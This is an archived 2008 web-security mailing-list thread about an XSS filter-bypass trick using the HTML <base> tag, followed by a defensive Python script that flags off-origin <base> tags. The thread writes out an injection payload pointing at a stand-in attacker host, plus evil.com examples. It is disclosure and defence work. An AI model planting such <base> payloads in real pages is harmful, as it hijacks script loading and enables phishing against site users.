RE: [WEB SECURITY] Nice little XSS trick
- From: "Arshan Dabirsiaghi" <arshan.dabirsiaghi@xxxxxxxxxxxxxxxxxx>
- Subject: RE: [WEB SECURITY] Nice little XSS trick
- Date: Wed, 16 Jul 2008 15:32:26 -0400
Yeah, and a typical, unfortunate reaction from sirdarkcat (not typical
of him, just of the security community in general). It's different
because it'd be trivially easy for the browser vendors to prevent the
javascript: technique, but almost impossible to fix this variant.
Arshan
-----Original Message-----
From: David Byrne [mailto:davidribyrne@xxxxxxxxx]
Sent: Wednesday, July 16, 2008 3:30 PM
To: Arshan Dabirsiaghi; Amit Klein
Cc: websecurity@xxxxxxxxxxxxx
Subject: Re: [WEB SECURITY] Nice little XSS trick
I need to indulge my vanity :) I posted something similar almost a year
ago. Granted, I didn't take the time to write it up nicely.
http://sla.ckers.org/forum/read.php?2,14751
----- Original Message ----
From: Arshan Dabirsiaghi <arshan.dabirsiaghi@xxxxxxxxxxxxxxxxxx>
To: Amit Klein <aksecurity@xxxxxxxxx>
Cc: websecurity@xxxxxxxxxxxxx
Sent: Wednesday, July 16, 2008 8:45:28 AM
Subject: RE: [WEB SECURITY] Nice little XSS trick
You're too nice - no need to apologize or defer credit. You discovered
it on your own. If you can't find it in Google, CWE or the OWASP Testing
Guide, I frankly don't think you can call it public knowledge, and
therefore it should be publicly discussed.
Arshan
-----Original Message-----
From: Amit Klein [mailto:aksecurity@xxxxxxxxx]
Sent: Wednesday, July 16, 2008 10:34 AM
To: Arshan Dabirsiaghi
Cc: websecurity@xxxxxxxxxxxxx
Subject: Re: [WEB SECURITY] Nice little XSS trick
Hi Arshan+list,
Indeed - the same vulnerability. I did google for it, but I didn't
pick up your site (and RSnake's cheat sheet doesn't list it - now I
know why).
Anyway - sorry. You deserve full credit for it, of course.
Thanks for the correction and the further information,
-Amit
On 7/16/08, Arshan Dabirsiaghi <arshan.dabirsiaghi@xxxxxxxxxxxxxxxxxx>
wrote:
>
> http://i8jesus.com/?p=10 (Jan 2008)
>
> I also presented this vector last year at OWASP San Jose when I demo'ed
> AntiSamy as an example of dangerous content that isn't malicious code on its
> own. That's one of the selling points of AntiSamy - it stops not only XSS
> (well, we hope) but also prevents phishing attacks that abuse HTML/CSS.
>
> I talked about it with RSnake afterwards and he had some crazy reason for
> not putting it on his cheatsheet - claimed it was too much like the <base
> href="javascript:foo();//"> vector. As noted on my blog post, IE7 is longer
> (according to policy) supposed to be honoring <base> tags outside of <HEAD>,
> but FF is still vulnerable. You could use this to hijack anything -
> stylesheets (more XSS/phishing), images, scripts, etc. The only thing <base>
> won't help you steal as far as resources is anything gathered in JavaScript.
>
> I think some of the big players had this figured out already (or more
> likely, just got really lucky). MySpace takes <base href> values, base64
> encodes them, and redirects them through another domain. The flow is like
> this for them:
>
> 1. User puts in <base href="http://evil.com">
> 2. Str = base64("http://evil.com")
> 3. Profile = <base href="http://msplinks.com/redir?<base64encodedStr>
>
> Maybe there's a way to abuse that, but I don't think so. And eBay doesn't
> have any relative links after user content, at least when I first looked at
> this last year. They probably both just got lucky. =]
>
> Arshan
>
> ---------- Previous message ----------
> From: Amit Klein <aksecurity@xxxxxxxxx>
> Date: Tue, Jul 15, 2008 at 7:33 AM
> Subject: [WEB SECURITY] Nice little XSS trick
> To: Web Security <websecurity@xxxxxxxxxxxxx>
>
> Hi list
>
> Recently I've been thinking about bypassing anti-XSS filters, and a nice
> little trick occurred to me, which I haven't seen anywhere (e.g. it's not on
> RSnake's XSS cheat sheet - http://ha.ckers.org/xss.html; it does mention
> BASE, but not the trick I describe here). The idea is to use the HTML BASE
> tag to force loading of JS code from the attacker's host. Consider a page
> with XSS vulnerability such as:
>
> <html>
> ...
> ***XSS code may be embedded here***
> ...
> <script src="/foo/bar.js"></script>
> ...
> </html>
>
> Now, an attacker can inject <base href="http://www.attacker.tld/">, and next
> thing you know, the browser (IE, at least) loads the JS from
> http://www.attacker.tld/foo/bar.js... And the beauty is that there's no
> "explicit" JS code involved in the payload itself.
>
> Note that according to the HTML standard, BASE should be placed in the HEAD
> section (http://www.w3.org/TR/html401/struct/links.html#edef-BASE).
> This is indeed observed by FF 2, but not by IE (checked IE6).
>
> Thanks,
>
> -Amit
----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec
Have a question? Search The Web Security Mailing List Archives:
http://www.webappsec.org/lists/websecurity/archive/
Subscribe via RSS:
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA
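Added example (not part of the thread, and not code from any of the posters): a small audit that checks rendered HTML for the condition Amit and Arshan describe, i.e. a <base href> that appears outside <head> or points off-origin, and then resolves every relative script/img/link/iframe reference the way a browser would, so a reviewer or a test suite can see which subresources would be fetched from a foreign host. It assumes, as the HTML spec says, that the first <base> with an href in document order sets the document base URL regardless of where it sits; the page URL, hostnames and HTML below are constructed sample values.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample: a page on our own origin where user-supplied content
# (the <base> tag) lands in <body> ahead of a relative script reference,
# mirroring the sketch in Amit's post. Hostnames are placeholders.
SAMPLE_PAGE_URL = "https://www.example.org/profile/view"
SAMPLE_HTML = """<html>
<head><title>Profile</title></head>
<body>
<p>user content starts here</p>
<base href="http://www.attacker.tld/">
<p>user content ends here</p>
<script src="/foo/bar.js"></script>
<img src="images/logo.png">
</body>
</html>"""


def origin_of(url):
    """scheme://host[:port], lower-cased, for same-origin comparison."""
    p = urlsplit(url)
    return f"{p.scheme}://{p.netloc}".lower()


class BaseTagAuditor(HTMLParser):
    """Records where the first <base href> sits and every subresource reference."""

    RESOURCE_ATTRS = {"script": "src", "img": "src", "iframe": "src", "link": "href"}

    def __init__(self):
        super().__init__()
        self.in_head = False
        self.base_href = None       # first <base href> wins (HTML spec)
        self.base_in_head = None    # was that <base> inside <head>?
        self.resources = []         # (tag, raw reference) in document order

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "head":
            self.in_head = True
        elif tag == "base" and attrs.get("href") is not None and self.base_href is None:
            self.base_href = attrs["href"]
            self.base_in_head = self.in_head
        elif tag in self.RESOURCE_ATTRS:
            ref = attrs.get(self.RESOURCE_ATTRS[tag])
            if ref:
                self.resources.append((tag, ref))

    def handle_endtag(self, tag):
        if tag == "head":
            self.in_head = False


def audit(page_url, html):
    """Return (findings, resolved).

    findings: human-readable problems (base outside head, base off-origin,
              subresource that would load off-origin).
    resolved: (tag, absolute_url, off_origin) for each subresource, using the
              effective document base the browser would apply.
    """
    parser = BaseTagAuditor()
    parser.feed(html)
    parser.close()

    findings = []
    effective_base = page_url
    if parser.base_href is not None:
        # A relative <base href> is itself resolved against the page URL.
        effective_base = urljoin(page_url, parser.base_href)
        if not parser.base_in_head:
            findings.append(f"<base> found outside <head>: href={parser.base_href!r}")
        if origin_of(effective_base) != origin_of(page_url):
            findings.append(f"<base> moves document base off-origin to {origin_of(effective_base)}")

    resolved = []
    for tag, ref in parser.resources:
        absolute = urljoin(effective_base, ref)
        off_origin = origin_of(absolute) != origin_of(page_url)
        resolved.append((tag, absolute, off_origin))
        if off_origin:
            findings.append(f"<{tag}> would load from off-origin URL {absolute}")
    return findings, resolved


if __name__ == "__main__":
    findings, resolved = audit(SAMPLE_PAGE_URL, SAMPLE_HTML)
    for f in findings:
        print("FINDING:", f)
    for tag, url, off in resolved:
        print(f"{tag:7s} -> {url}{'  (OFF-ORIGIN)' if off else ''}")
```

Run against the sample it reports the injected <base> as outside <head> and off-origin, and shows /foo/bar.js resolving to http://www.attacker.tld/foo/bar.js, which is exactly the load Amit describes. A <base> that legitimately sits in <head> and stays on the page's origin produces no findings, so the same check can run as a regression test over templates or over HTML captured from a staging environment. Note that urljoin follows RFC 3986 resolution, so a relative <base href> and scheme-relative references are handled the same way a browser would handle them.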
Brought to you by http://www.webappsec.org